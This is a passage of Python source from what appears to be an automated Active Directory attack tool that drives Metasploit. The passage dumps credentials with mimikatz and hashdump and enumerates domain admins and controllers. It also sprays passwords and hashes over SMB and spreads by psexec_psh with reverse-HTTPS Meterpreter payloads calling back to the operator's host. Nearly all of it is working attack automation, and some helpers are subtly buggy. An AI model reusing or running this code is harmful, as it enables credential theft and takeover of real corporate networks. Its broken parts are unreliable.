294 | with await lock:
295 | for d in domain_data['domains']:
296 | all_DCs += [x for x in domain_data['domains'][d]]
297 | return all_DCs
298 |
299 | def parse_pid(output, user, proc):
300 | for l in output.splitlines():
301 | l_split = l.strip().split()
302 |
303 | # Normal users can't have spaces but we need to make exception for NT AUTHORITY
304 | if user.lower() == b'nt authority\\system':
305 | nt = b'NT'
306 | auth = b'AUTHORITY\\SYSTEM'
307 | if nt in l_split and auth in l_split:
308 | nt_offset = l_split.index(nt)
309 | auth_offset = l_split.index(auth)
310 | l_split.remove(auth)
311 | l_split[nt_offset] = nt+b' '+auth
312 |
313 | if proc in l_split and user in l_split:
314 | pid = l_split[0]
315 | return pid
316 |
317 | #async def migrate_custom_proc(client, sess_num):
318 | #
319 | # print_info('Migrating to stable process', 'Session', sess_num)
320 | #
321 | # # Get own pid
322 | # cmd = 'getpid'
323 | # end_strs = [b'Current pid: ']
324 | # output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
325 | # if err:
326 | # return err
327 | # cur_pid = output.split(end_strs[0])[1].strip()
328 | #
329 | # # Get stable proc's pid
330 | # cmd = 'ps'
331 | # end_strs = [b' PID PPID']
332 | # output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
333 | # if err:
334 | # return err
335 | # user = sess_data[sess_num][b'user']
336 | # proc = b'explorer.exe'
337 | # pid = parse_pid(output, user, proc)
338 | # # In case user is NT AUTHORITY\\SYSTEM which has no explorer.exe
339 | # if not pid:
340 | # proc = b'lsass.exe'
341 | # pid = parse_pid(output, user, proc)
342 | #
343 | # # When a session dies in this function its usually here that it errors out
344 | # if not pid:
345 | # msg = 'No migration PID found likely due to abrupt death of session'
346 | # print_bad(msg, 'Session', sess_num)
347 | # sess_data[sess_num][b'errors'].append(msg)
348 | # return msg
349 | #
350 | # # If we're not already in the pid then migrate
351 | # if pid != cur_pid:
352 | # # Migrate to pid
353 | # cmd = 'migrate '+pid.decode('utf8')
354 | # end_strs = [b'Migration completed successfully.',
355 | # b'Session is already in target process',
356 | # b'[+] Already in',
357 | # b'[+] Successfully migrated to']
358 | # output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
359 | #
360 | async def run_priv_migrate(client, sess_num, sess_data):
361 | print_info('Migrating to similar privilege process', 'Session', sess_num)
362 | cmd = 'run post/windows/manage/priv_migrate'
363 | end_strs = [b'Migration completed successfully.',
364 | b'Session is already in target process',
365 | b'[+] Already in',
366 | b'[+] Successfully migrated to']
367 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
368 | if err:
369 | return err
370 |
371 | async def check_privs(client, sess_num, sess_data):
372 |
373 | cmd = 'run post/windows/gather/win_privs'
374 | end_strs = [b'==================']
375 |
376 | await make_session_busy(sess_num, sess_data)
377 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
378 | make_session_not_busy(sess_num, sess_data)
379 | if err:
380 | admin_shell = b'ERROR'
381 | local_admin = b'ERROR'
382 |
383 | else:
384 | split_out = output.splitlines()
385 |
386 | # Sometimes gets extra output from priv_migrate in this output
387 | offset = 5
388 | for num,l in enumerate(split_out):
389 | if b'True' in l or b'False' in l:
390 | offset = num
391 |
392 | user_info_list = split_out[offset].split()
393 | system = user_info_list[1]
394 | user = user_info_list[5]
395 | admin_shell = user_info_list[0]
396 | local_admin = user_info_list[2]
397 |
398 | sess_data[sess_num][b'admin_shell'] = admin_shell
399 | sess_data[sess_num][b'local_admin'] = local_admin
400 |
401 | return (admin_shell, local_admin)
402 |
403 | async def exec_process(*cmd):
404 | p = await asyncio.create_subprocess_exec(*cmd,
405 | stdin=asyncio.subprocess.PIPE,
406 | stdout=asyncio.subprocess.PIPE,
407 | stderr=asyncio.subprocess.PIPE)
408 | stdout, stderr = await p.communicate()
409 | if stdout:
410 | stdout = stdout.decode('utf8')
411 | if stderr:
412 | stderr = stderr.decode('utf8')
413 | return (stdout, stderr)
414 |
415 | async def host_to_ip(sess_num, host):
416 | stdout, stderr = await exec_process('host', host)
417 | if stderr:
418 | print_bad('Error converting host to IP: {}'.format(stderr), 'Session', sess_num)
419 | else:
420 | for l in stdout.splitlines():
421 | l = l.strip()
422 | if ' has address ' in l:
423 | ip = l.split()[-1]
424 | return ip
425 |
426 | async def start_shell(client, sess_num, sess_data):
427 | ''' start OS cmd prompt on a meterpreter session '''
428 | cmd = 'shell'
429 | end_strs = [b'>']
430 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
431 |
432 | async def end_shell(client, sess_num, sess_data):
433 | ''' ends OS cmd prompt on a meterpreter session '''
434 | cmd = 'exit'
435 | end_strs = [b'exit']
436 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs, api_call='write')
437 |
438 | async def get_domains_and_DCs(lock, client, sess_num, sess_data):
439 | print_info('Getting domain controller', 'Session', sess_num)
440 |
441 | cmd = 'wmic NTDOMAIN GET DomainControllerAddress,DomainName /VALUE'
442 | end_strs = [b'>']
443 |
444 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs, api_call='write')
445 | if err:
446 | return
447 |
448 | output = output.decode('utf8')
449 |
450 | domains_and_DCs = parse_domain_wmic(output)
451 |
452 | return domains_and_DCs
453 |
454 | def parse_domain_wmic(output):
455 | ''' Example output:
456 |
457 | DomainControllerAddress=
458 | DomainName=
459 | Roles=
460 |
461 |
462 | DomainControllerAddress=\\192.168.243.129
463 | DomainName=LAB2
464 | Roles= '''
465 |
466 | DC_str = 'DomainControllerAddress=\\\\'
467 | domain_str = 'DomainName='
468 | domains_and_DCs = {}
469 | DC = None
470 |
471 | # remove empty lines from output
472 | output = os.linesep.join([s for s in output.splitlines() if s])
473 |
474 | for l in output.splitlines():
475 | l = l.strip()
476 |
477 | if DC:
478 | if domain_str in l:
479 | domain = l.split(domain_str)[1].lower()
480 | if domain in domains_and_DCs:
481 | domains_and_DCs[domain].append(DC)
482 | else:
483 | domains_and_DCs[domain] = [DC]
484 |
485 | DC = None
486 |
487 | elif DC_str in l:
488 | DC = l.split(DC_str)[1]
489 |
490 | return domains_and_DCs
491 |
492 | #def get_domain(shell_info):
493 | # for l in shell_info:
494 | #
495 | # l = l.decode('utf8')
496 | #
497 | # l_split = l.split(':')
498 | # if 'Domain ' in l_split[0]:
499 | # if 'WORKGROUP' in l_split[1]:
500 | # return b'no domain'
501 | # else:
502 | # domain = l_split[-1].strip()
503 | # return domain.encode()
504 |
505 | async def get_domain_admins(lock, client, sess_num, sess_data, domain_data):
506 | ''' Session is dropped into a cmd prompt prior to this function running '''
507 | print_info('Getting domain admins', 'Session', sess_num)
508 | end_strs = [b'>']
509 |
510 | domain_admins = []
511 | domains = []
512 |
513 | # Get domains
514 | with await lock:
515 | for domain in domain_data['domains']:
516 | domains.append(domain.lower())
517 |
518 | for domain in domains:
519 | cmd = 'wmic path win32_groupuser where (groupcomponent=\'win32_group.name="domain admins",domain="{}"\')'.format(domain)
520 | await make_session_busy(sess_num, sess_data)
521 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs, api_call='write')
522 | make_session_not_busy(sess_num, sess_data)
523 | if err:
524 | continue
525 | DAs = await parse_wmic_DA_out(output)
526 | domain_admins += DAs
527 |
528 | return domain_admins
529 |
530 | async def parse_wmic_DA_out(output):
531 | ''' example line:
532 | win32_group.domain="lab2",name="domain admins" \\WIN10-2\root\cimv2:Win32_UserAccount.Domain="lab2",Name="Administrator"
533 | '''
534 | DAs = []
535 | output = output.decode('utf8')
536 | for l in output.splitlines():
537 | if 'Win32_UserAccount.Domain' in l:
538 | l_split = l.split()
539 | # \\WIN10-2\root\cimv2:Win32_UserAccount.Domain="lab2",Name="Administrator"
540 | part_component = l_split[2]
541 | re_user = re.search('Name="(.*?)"',part_component)
542 | re_dom = re.search('Domain="(.*?)"',part_component)
543 | if re_user and re_dom:
544 | user = re_user.group(1)
545 | dom = re_dom.group(1)
546 | dom_user = dom+'\\'+user
547 | DAs.append(dom_user)
548 |
549 | return DAs
550 |
551 | def update_session(msf_sess, msf_sess_num, sess_data):
552 | if msf_sess_num in sess_data:
553 | # Update session with the new key:value's in sess_data
554 | # This will not change any of the MSF session data, just add new key:value pairs
555 | sess_data[msf_sess_num] = add_session_keys(msf_sess, sess_data, msf_sess_num)
556 | else:
557 | sess_data[msf_sess_num] = msf_sess
558 |
559 | async def get_windir(client, sess_num, sess_data):
560 | cmd = 'echo %WINDIR%'
561 | end_strs = [b'>']
562 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs, api_call='write')
563 | if err:
564 | return
565 |
566 | output = output.decode('utf8')
567 | for l in output.splitlines():
568 | if ':\\' in l:
569 | windir = l.strip()
570 | return windir
571 |
572 | async def run_psh_cmd_with_output(client, sess_num, sess_data, ps_cmd):
573 | ''' There is no timeout setting for the powershell plugin in metasploit
574 | so shit just times out super fast. We hack around this by running long-running
575 | cmds then trying a fast cmd like write-host and wait until write-host actually
576 | works '''
577 |
578 | write_dir = await get_writeable_path(client, sess_num, sess_data)
579 |
580 | redir_out = ' > "{}\\cache"'.format(write_dir)
581 | cmd = 'powershell_execute \'{}{}\''.format(ps_cmd, redir_out)
582 | end_strs = [b'ThisStringShouldNeverAppear']
583 |
584 | await make_session_busy(sess_num, sess_data)
585 | # Make powershell_execute timeout immediately
586 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
587 | if err:
588 | # Timeouts are ineffective measures of whether the cmd is done
589 | # because MSF doesn't have a way of changing powershell_execute
590 | # timeout values. Timeouts are, however, effective at measuring
591 | # when the session is back to being available so we can then
592 | # try new PSH commands until they stop giving a specific error
593 | if 'Rex::TimeoutError' not in err:
594 | return
595 |
596 | # Check if cmd is done yet
597 | await wait_for_psh_cmd(client, sess_num, sess_data, cmd)
598 |
599 | # Download and read remote file
600 | path = '{}\\cache'.format(write_dir)
601 | output = await read_remote_file(client, sess_num, sess_data, path)
602 | output = output.decode('utf16').encode('utf8')
603 |
604 | make_session_not_busy(sess_num, sess_data)
605 |
606 | return output
607 |
608 | async def parse_userhunter(output, sess_num, domain_data):
609 | for l in output.splitlines():
610 | l = l.strip()
611 | if b'IPAddress :' in l:
612 | ip = l.split()[-1].decode('utf8')
613 | if ip not in domain_data['high_priority_ips']:
614 | print_good('IP with domain admin logged in: {}'.format(ip), 'Session', sess_num)
615 | domain_data['high_priority_ips'].append(ip)
616 |
617 | domain_data['high_priority_ips'].remove('pending')
618 |
619 | async def read_remote_file(client, sess_num, sess_data, path):
620 | cmd = 'download "{}"'.format(path)
621 | end_strs = [b'[*] download :', b'[*] skipped :']
622 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
623 | if err:
624 | return
625 |
626 | cmd = 'rm "{}"'.format(path)
627 | # rm will return None which is caught as the end of the command
628 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs, timeout=5)
629 |
630 | filename = path.split('\\')[-1]
631 | with open(filename, 'rb') as f:
632 | content = f.read()
633 |
634 | return content
635 |
636 | async def wait_for_psh_cmd(client, sess_num, sess_data, cmd):
637 | while True:
638 | running_ps_cmd = cmd.split()[1][1:] # knock off the first '
639 | end_str = 'Checking if [{}] has finished'.format(running_ps_cmd).encode()
640 | checking_cmd = 'powershell_execute "write-host Checking if [{}] has finished"'.format(running_ps_cmd)
641 | end_strs = [end_str]
642 | output, err = await run_session_cmd(client, sess_num, sess_data, checking_cmd, end_strs, api_call='write')
643 | if not err:
644 | break
645 | await asyncio.sleep(15)
646 |
647 | async def get_writeable_path(client, sess_num, sess_data):
648 | if b'write_dir' in sess_data[sess_num]:
649 | write_dir = sess_data[sess_num][b'write_dir']
650 | return write_dir
651 |
652 | await make_session_busy(sess_num, sess_data)
653 | await start_shell(client, sess_num, sess_data)
654 |
655 | # System's write path will just be C:\windows\temp
656 | if b'authority\\system' in sess_data[sess_num][b'user'].lower():
657 | windir = await get_windir(client, sess_num, sess_data)
658 | write_path = windir+'\\temp'
659 | sess_data[sess_num][b'write_path'] = write_path
660 |
661 | # Regular user write path will be something like "C:\users\username\AppData\Local"
662 | else:
663 | # Get user's home directory
664 | cmd = 'echo %USERPROFILE%'
665 | out_lines = await run_shell_cmd(client, sess_num, sess_data, cmd)
666 | if out_lines:
667 | for l in out_lines:
668 | if ":\\" in l:
669 | home_dir = l.strip()
670 | break
671 |
672 | write_path = '{}\\AppData\\Local'.format(home_dir)
673 | sess_data[sess_num][b'write_path'] = write_path
674 |
675 | make_session_not_busy(sess_num, sess_data)
676 | await end_shell(client, sess_num, sess_data)
677 |
678 | return write_path
679 |
680 | async def run_shell_cmd(client, sess_num, sess_data, cmd):
681 | end_strs = [b'>']
682 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs, api_call='write')
683 | if err:
684 | return
685 |
686 | return output.decode('utf8').splitlines()
687 |
688 | async def run_userhunter(client, sess_num, sess_data, domain_data):
689 |
690 | print_info('Running Find-DomainUserLocation to collect IPs that domain admins are on', 'Session', sess_num)
691 |
692 | domain_data['high_priority_ips'].append('pending')
693 |
694 | plugin = 'powershell'
695 | output, err = await load_met_plugin(client, sess_num, sess_data, plugin)
696 | if err:
697 | domain_data['high_priority_ips'].remove('pending')
698 | return
699 |
700 | script_path = os.getcwd()+'/scripts/obf-pview.ps1'
701 | output, err = await powershell_import(client, sess_num, sess_data, script_path)
702 | if err:
703 | domain_data['high_priority_ips'].remove('pending')
704 | return
705 |
706 | cmd = 'Find-DomainUserLocation'
707 | output = await run_psh_cmd_with_output(client, sess_num, sess_data, cmd)
708 | if output:
709 | await parse_userhunter(output, sess_num, domain_data)
710 | else:
711 | domain_data['high_priority_ips'].remove('pending')
712 |
713 |
714 | async def powershell_import(client, sess_num, sess_data, script_path):
715 | cmd = 'powershell_import '+ script_path
716 | end_strs = [b'successfully imported']
717 |
718 | await make_session_busy(sess_num, sess_data)
719 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
720 | make_session_not_busy(sess_num, sess_data)
721 |
722 | return (output, err)
723 |
724 | async def load_met_plugin(client, sess_num, sess_data, plugin):
725 | cmd = 'load '+plugin
726 | end_strs = [b'Success.', b'has already been loaded.']
727 |
728 | await make_session_busy(sess_num, sess_data)
729 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
730 | make_session_not_busy(sess_num, sess_data)
731 |
732 | return (output, err)
733 |
734 | async def run_mimikatz(lock, client, sess_num, sess_data, domain_data):
735 |
736 | # Load_met_plugin already keeps the session busy
737 | # plugin = 'mimikatz'
738 | plugin = 'kiwi'
739 | output, err = await load_met_plugin(client, sess_num, sess_data, plugin)
740 | if err:
741 | return
742 |
743 | cmd = 'wdigest'
744 | end_strs = [b' Password']
745 |
746 | await make_session_busy(sess_num, sess_data)
747 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
748 | make_session_not_busy(sess_num, sess_data)
749 |
750 | if err:
751 | return
752 |
753 | mimikatz_split = output.splitlines()
754 | for l in mimikatz_split:
755 |
756 | if l.startswith(b'0;'):
757 | line_split = l.split(None, 4)
758 |
759 | # Output may include accounts without a password
760 | # Here's what I've seen that causes problems:
761 | #ob'AuthID Package Domain User Password'
762 | #b'------ ------- ------ ---- --------'
763 | #b'0;1299212671 Negotiate IIS APPPOOL DefaultAppPool '
764 | #b'0;995 Negotiate NT AUTHORITY IUSR '
765 | #b'0;997 Negotiate NT AUTHORITY LOCAL SERVICE '
766 | #b'0;41167 NTLM '
767 |
768 | if len(line_split) < 5:
769 | continue
770 |
771 | dom = line_split[2].lower()
772 | if dom.lower() in sess_data[sess_num][b'domain']:
773 | dom_user = '{}\\{}'.format(dom.decode('utf8').lower(), line_split[3].decode('utf8'))
774 | password = line_split[4]
775 |
776 | # Check if it's just some hex shit that we can't use
777 | if password.count(b' ') > 200:
778 | continue
779 |
780 | if b'wdigest KO' not in password:
781 | creds = '{}:{}'.format(dom_user, password.decode('utf8'))
782 | if creds not in domain_data['creds']:
783 | domain_data['creds'].append(creds)
784 | msg = 'Creds found through Mimikatz: '+creds
785 | print_good(msg, 'Session', sess_num)
786 | await check_for_DA(lock, client, creds, sess_num, domain_data)
787 |
788 | async def check_creds_against_DC(lock, client, sess_num, cred_data, domain_data):
789 | domain_data_key = 'domain_controllers'
790 | if domain_data_key in domain_data:
791 |
792 | dom_data_copy = domain_data.copy()
793 | print_info('Checking [{}:{}] against domain controllers'.format(cred_data[1], cred_data[2]), 'Session', sess_num)
794 | c_ids = [x[b'id'] for x in client.call('console.list')[b'consoles']]
795 | c_id = await get_nonbusy_cid(client, c_ids)
796 |
797 | filename = 'DCs'
798 | target_ips = create_hostsfile(dom_data_copy, filename, domain_data_key)
799 | threads = '1'
800 | dom = cred_data[0]
801 | user = cred_data[1]
802 | pwd = cred_data[2]
803 | lhost = get_local_ip(get_iface())
804 |
805 | cmd, output, err = await run_smb_login(client, c_id, lhost, threads, user, pwd, dom, target_ips)
806 | await parse_smb_login(lock, c_id, output, domain_data)
807 |
808 | async def make_session_busy(sess_num, sess_data):
809 | while sess_data[sess_num][b'busy'] == b'True':
810 | await asyncio.sleep(1)
811 | sess_data[sess_num][b'busy'] == b'True'
812 |
813 | def make_session_not_busy(sess_num, sess_data):
814 | sess_data[sess_num][b'busy'] == b'False'
815 |
816 | async def check_for_DA(lock, client, creds, sess_num, domain_data):
817 |
818 | dom_user = creds.split(':', 1)[0]
819 | DAs = []
820 | cred_data = None
821 |
822 | # Get a copy of domain_data['domain_admins']
823 | with await lock:
824 | for x in domain_data['domain_admins']:
825 | DAs.append(x)
826 |
827 | # Got a hash
828 | if creds.count(':') > 5 and creds.endswith(':::'):
829 | hash_split = creds.split(':')
830 | user = hash_split[0]
831 | rid = hash_split[1]
832 | lm = hash_split[2]
833 | ntlm = hash_split[3]
834 |
835 | # In case there's a DA like LAB\Administrator we don't want to trigger
836 | # on all RID 500 Admin usernames
837 | if user.lower() == 'administrator':
838 | return
839 |
840 | if len(DAs) > 0:
841 | for c in DAs:
842 | da_user = c.split('\\')[1]
843 | if user.lower() == da_user.lower():
844 | dom = '.'
845 | lm_ntlm = lm+':'+ntlm
846 | cred_data = (dom, user, lm_ntlm)
847 | break
848 |
849 | # plaintext
850 | else:
851 | split_creds = creds.split(':', 1)
852 | dom_user = split_creds[0]
853 | pwd = split_creds[1]
854 | dom_user_split = dom_user.split('\\', 1)
855 | dom = dom_user_split[0]
856 | user = dom_user_split[1]
857 | for c in DAs:
858 | if dom_user.lower() == c.lower():
859 | cred_data = (dom, user, pwd)
860 | break
861 |
862 | if cred_data:
863 | msg = 'Potential domain admin found! '+creds
864 | print_good(msg, 'Session', sess_num)
865 | if len(domain_data['domain_controllers']) > 0:
866 | # This will run smb_login and parse_smb_login will tell us if its DA
867 | await check_creds_against_DC(lock, client, sess_num, cred_data, domain_data)
868 |
869 | async def get_passwords(lock, client, sess_num, sess_data, domain_data):
870 | await run_mimikatz(lock, client, sess_num, sess_data, domain_data)
871 | await run_hashdump(lock, client, sess_num, sess_data, domain_data)
872 | #mimikittenz
873 |
874 | async def run_hashdump(lock, client, sess_num, sess_data, domain_data):
875 | cmd = 'hashdump'
876 | end_strs = None
877 |
878 | await make_session_busy(sess_num, sess_data)
879 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
880 | make_session_not_busy(sess_num, sess_data)
881 |
882 | if err:
883 | return
884 |
885 | for l in output.splitlines():
886 | l = l.strip().decode('utf8')
887 | if l not in domain_data['creds']:
888 | domain_data['creds'].append(l)
889 | msg = 'Hashdump creds - '+l
890 | print_good(msg, 'Session', sess_num)
891 | #await check_for_DA(lock, client, l, sess_num, domain_data)
892 |
893 | def get_console_ids(client):
894 | c_ids = [x[b'id'] for x in client.call('console.list')[b'consoles']]
895 |
896 | print_info('Opening Metasploit consoles', None, None)
897 | while len(c_ids) < 5:
898 | client.call('console.create')
899 | c_ids = [x[b'id'] for x in client.call('console.list')[b'consoles']] # Wait for response
900 | time.sleep(2)
901 |
902 | for c_id in c_ids:
903 | client.call('console.read', [c_id])[b'data'].decode('utf8').splitlines()
904 |
905 | return c_ids
906 |
907 | async def run_msf_module(client, c_id, mod, rhost_var, target_ips, lhost, extra_opts, start_cmd, end_strs):
908 |
909 | payload = 'windows/x64/meterpreter/reverse_https'
910 | cmd = create_msf_cmd(mod, rhost_var, target_ips, lhost, payload, extra_opts, start_cmd)
911 | mod_out, err = await run_console_cmd(client, c_id, cmd, end_strs)
912 |
913 | return (cmd, mod_out, err)
914 |
915 | def create_msf_cmd(module_path, rhost_var, target_ips, lhost, payload, extra_opts, start_cmd):
916 | cmds = ('use {}\n'
917 | 'set {} {}\n'
918 | 'set LHOST {}\n'
919 | 'set payload {}\n'
920 | '{}\n'
921 | '{}\n').format(module_path, rhost_var, target_ips, lhost, payload, extra_opts, start_cmd)
922 |
923 | return cmds
924 |
925 | async def run_console_cmd(client, c_id, cmd, end_strs):
926 | '''
927 | Runs module and gets output
928 | '''
929 | err = None
930 | cmd_split = cmd.splitlines()
931 | module = cmd_split[0].split()[1]
932 | print_info('Running MSF module [{}]'.format(module), 'Console', c_id)
933 | client.call('console.write',[c_id, cmd])
934 |
935 | output = await get_console_output(client, c_id, end_strs)
936 | err = get_output_errors(output, cmd)
937 | if err:
938 | print_bad(err, 'Console', c_id)
939 |
940 | return (output, err)
941 |
942 | async def get_console_output(client, c_id, end_strs, timeout=60):
943 | '''
944 | The only way to get console busy status is through console.read or console.list
945 | console.read clears the output buffer so you gotta use console.list
946 | but console.list requires you know the list offset of the c_id console
947 | so this ridiculous list comprehension seems necessary to avoid assuming
948 | what the right list offset might be
949 | '''
950 | counter = 0
951 | sleep_secs = 1
952 | list_offset = int([x[b'id'] for x in client.call('console.list')[b'consoles'] if x[b'id'] is c_id][0])
953 | output = b''
954 |
955 | # Give it a chance to start
956 | await asyncio.sleep(sleep_secs)
957 |
958 | # Get any initial output
959 | output += client.call('console.read', [c_id])[b'data']
960 |
961 | while client.call('console.list')[b'consoles'][list_offset][b'busy'] == True:
962 | output += client.call('console.read', [c_id])[b'data']
963 | await asyncio.sleep(sleep_secs)
964 | counter += sleep_secs
965 |
966 | while True:
967 | output += client.call('console.read', [c_id])[b'data']
968 |
969 | if end_strs:
970 |
971 | if any(end_strs in output for end_strs in end_strs):
972 | break
973 |
974 | if counter > timeout:
975 | break
976 |
977 | await asyncio.sleep(sleep_secs)
978 | counter += sleep_secs
979 |
980 | # Get remaining output
981 | output += client.call('console.read', [c_id])[b'data']
982 |
983 | debug_info(output, 'Console', c_id)
984 |
985 | return output
986 |
987 | async def get_nonbusy_cid(client, c_ids):
988 | while True:
989 | for c_id in c_ids:
990 | list_offset = int([x[b'id'] for x in client.call('console.list')[b'consoles'] if x[b'id'] is c_id][0])
991 | if client.call('console.list')[b'consoles'][list_offset][b'busy'] == False:
992 | return c_id
993 | await asyncio.sleep(1)
994 |
995 | def plaintext_or_hash(creds):
996 | if creds.count(':') == 6 and creds.endswith(':::'):
997 | return 'hash'
998 | else:
999 | return 'plaintext'
1000 |
1001 | def parse_creds(creds):
1002 | cred_type = plaintext_or_hash(creds)
1003 | if cred_type == 'hash':
1004 | hash_split = creds.split(':')
1005 | rid = hash_split[1]
1006 | user = hash_split[0]
1007 | lm = hash_split[2]
1008 | ntlm = hash_split[3] # ntlm hash
1009 | pwd = lm+':'+ntlm # need lm:ntlm for PTH in metasploit
1010 | dom = '.' # this also means WORKGROUP or non-domain login in msf
1011 |
1012 | elif cred_type == 'plaintext':
1013 | cred_split = creds.split(':')
1014 | user = cred_split[0]
1015 | # Remove domain from user
1016 | if "\\" in user:
1017 | user_split = user.split("\\")
1018 | user = user_split[1]
1019 | dom = user_split[0]
1020 | pwd = cred_split[1]
1021 | rid = None
1022 |
1023 | return dom, user, pwd, rid
1024 |
1025 | async def spread(lock, client, c_ids, lhost, sess_data, domain_data):
1026 |
1027 | while True:
1028 | # Copy the dict so we can loop it safely
1029 | dom_data_copy = domain_data.copy()
1030 |
1031 | for c in dom_data_copy['creds']:
1032 | if c not in dom_data_copy['checked_creds']:
1033 | # Set up a dict where the key is the creds and the val are the hosts we are admin on
1034 | dom_data_copy['checked_creds'][c] = []
1035 | await run_smb_brute(lock, client, c_ids, lhost, c, domain_data, dom_data_copy)
1036 |
1037 | await get_new_shells(lock, client, c_ids, lhost, sess_data, domain_data, dom_data_copy)
1038 |
1039 | await asyncio.sleep(1)
1040 |
1041 | async def run_smb_login(client, c_id, lhost, threads, user, pwd, dom, target_ips):
1042 | mod = 'auxiliary/scanner/smb/smb_login'
1043 | rhost_var = 'RHOSTS'
1044 | start_cmd = 'run'
1045 | extra_opts = ('set threads {}\n'
1046 | 'set smbuser {}\n'
1047 | 'set smbpass {}\n'
1048 | 'set smbdomain {}'.format(threads, user, pwd, dom))
1049 | end_strs = [b'Auxiliary module execution completed']
1050 |
1051 |
1052 | if 'file:' in target_ips:
1053 | print_info('Spraying credentials [{}:{}] against hosts'.format(user, pwd), 'Console', c_id)
1054 | else:
1055 | print_info('Trying credentials [{}:{}] against {}'.format(user, pwd, target_ips), 'Console', c_id)
1056 |
1057 | cmd, output, err = await run_msf_module(client, c_id, mod, rhost_var, target_ips, lhost, extra_opts, start_cmd, end_strs)
1058 | return (cmd, output, err)
1059 |
1060 | async def run_smb_brute(lock, client, c_ids, lhost, creds, domain_data, dom_data_copy):
1061 | cred_type = plaintext_or_hash(creds)
1062 | dom, user, pwd, rid = parse_creds(creds)
1063 | threads = '32'
1064 |
1065 | # Just smb brute with rid 500 for now
1066 | if cred_type == 'hash' and rid != '500':
1067 | return
1068 |
1069 | filename = 'unchecked_hosts'
1070 | domain_data_key = 'hosts'
1071 | target_ips = create_hostsfile(dom_data_copy, filename, domain_data_key)
1072 | c_id = await get_nonbusy_cid(client, c_ids)
1073 |
1074 | cmd, output, err = await run_smb_login(client, c_id, lhost, threads, user, pwd, dom, target_ips)
1075 |
1076 | await parse_module_output(lock, c_id, err, cmd, output, domain_data)
1077 |
1078 | async def get_admin_session_data(lock, sess_data, domain_data):
1079 |
1080 | # Get all session IPs and figure out if they're admin shells so we don't overlap our spread
1081 | admin_sess_data = {}
1082 | with await lock:
1083 | for sess_num in sess_data:
1084 | ip = sess_data[sess_num][b'tunnel_peer'].split(b':')[0]
1085 | utf8_ip = ip.decode('utf8')
1086 | if b'admin_shell' not in sess_data[sess_num]:
1087 | continue
1088 |
1089 | # In case we have multiple shells on the same IP, we must collect
1090 | # all their admin_shell properties to check later if we have any
1091 | # admin shells on that IP
1092 | admin_sess_data[ip] = []
1093 |
1094 | admin_shell = sess_data[sess_num][b'admin_shell']
1095 | admin_sess_data[ip].append(admin_shell)
1096 |
1097 | # Remove IP from pending_shell_ips which exists so spread() doesn't
1098 | # spread to an IP that's waiting for psexec_psh to finish
1099 | if admin_shell == b'True':
1100 | if utf8_ip in domain_data['pending_shell_ips']:
1101 | domain_data['pending_shell_ips'].remove(utf8_ip)
1102 |
1103 | return admin_sess_data
1104 |
1105 | async def get_new_shells(lock, client, c_ids, lhost, sess_data, domain_data, dom_data_copy):
1106 |
1107 | admin_session_data = await get_admin_session_data(lock, sess_data, domain_data)
1108 |
1109 | c_id = await get_nonbusy_cid(client, c_ids)
1110 |
1111 | # run psexec_psh on all ips that we either don't have a shell on already or don't have an admin shell on
1112 | # dom_data_copy['checked_creds']['LAB\\dan:P@ssw0rd'] = [list of ips we have admin for those creds]
1113 | for creds in dom_data_copy['checked_creds']:
1114 | for admin_ip in dom_data_copy['checked_creds'][creds]:
1115 | bytes_admin_ip = admin_ip.encode()
1116 |
1117 | # Shells take a minute to open so we don't want to double up on shells while they open
1118 | if admin_ip not in domain_data['pending_shell_ips']:
1119 |
1120 | # Check if the IP we have admin on already has a session
1121 | if bytes_admin_ip in admin_session_data:
1122 |
1123 | # If we have a shell on it but we're not admin, then continue get admin shell
1124 | # admin_shell_vals = [b'True', b'False', b'True'] depending on how many shells we have on that IP
1125 | # Making design decision here to not check if the session is broken or not because it's too easy
1126 | # for that to lead to infinite loops of spreading with broken sess after broken sess
1127 | admin_shell_vals = [x for x in admin_session_data[bytes_admin_ip]]
1128 | if b'True' in admin_shell_vals:
1129 | continue
1130 |
1131 | # Either we don't have this IP in our session, or there's no admin session open on it
1132 | await run_psexec_psh(lock, client, c_id, creds, admin_ip, lhost, domain_data)
1133 | # await get_shell_wmic(lock, client, c_id, creds, admin_ip, lhost, domain_data)
1134 |
1135 | async def run_psexec_psh(lock, client, c_id, creds, ip, lhost, domain_data):
1136 | dom, user, pwd, rid = parse_creds(creds)
1137 |
1138 | # Skip non-RID 500 local logins for now
1139 | # Move this later on so we can PTH of domain admins we find - debug
1140 | if dom == '.':
1141 | if rid != '500':
1142 | return
1143 |
1144 | mod = 'exploit/windows/smb/psexec_psh'
1145 | rhost_var = 'RHOST'
1146 | start_cmd = 'exploit -z'
1147 | extra_opts = ('set smbuser {}\n'
1148 | 'set smbpass {}\n'
1149 | 'set smbdomain {}'.format(user, pwd, dom))
1150 | end_strs = [b'[*] Meterpreter session ']
1151 |
1152 | domain_data['pending_shell_ips'].append(ip)
1153 | print_info('Performing lateral movement with credentials [{}:{}] against host [{}]'.format(user, pwd, ip), 'Console', c_id)
1154 | cmd, output, err = await run_msf_module(client, c_id, mod, rhost_var, ip, lhost, extra_opts, start_cmd, end_strs)
1155 | await parse_module_output(lock, c_id, err, cmd, output, domain_data)
1156 |
1157 | async def parse_module_output(lock, c_id, err, cmd, output, domain_data):
1158 | if 'smb_login' in cmd:
1159 | await parse_smb_login(lock, c_id, output, domain_data)
1160 | elif 'psexec_psh' in cmd:
1161 | await parse_psexec_psh(lock, c_id, err, cmd, output, domain_data)
1162 |
